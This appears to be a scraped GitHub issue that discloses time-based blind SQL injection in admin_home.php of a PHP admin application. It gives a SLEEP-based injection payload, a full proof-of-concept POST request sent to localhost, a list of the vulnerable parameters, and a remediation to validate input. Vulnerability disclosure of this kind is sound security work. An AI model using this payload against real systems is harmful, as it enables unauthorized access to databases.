Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
KhanhCM (@khanhchauminh)
Example payload:
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND 'a'='a
POST /admin_home.php HTTP/1.1 Host: 127.0.0.1:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1:8888/admin_home.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jb2naa6oef92cak3bcohm1dus1 Connection: close afullname=staff1'%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)%20AND%20'a'%3d'a&aemail=staff1%40example.com&apassword=password
Validate input of all vulnerable parameters in admin_home.php.
admin_home.php
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Author
KhanhCM (@khanhchauminh)
Version: 1.0
Vulnerable parameters
Staff Registration:
Doctor Registration:
Delete Clerks:
Delete Doctor:
Steps to reproduce
Example payload:
Proof-of-concept
Response in Burpsuite
Source code review
admin_home.php
library.php
Remediation
Validate input of all vulnerable parameters in
admin_home.php.The text was updated successfully, but these errors were encountered: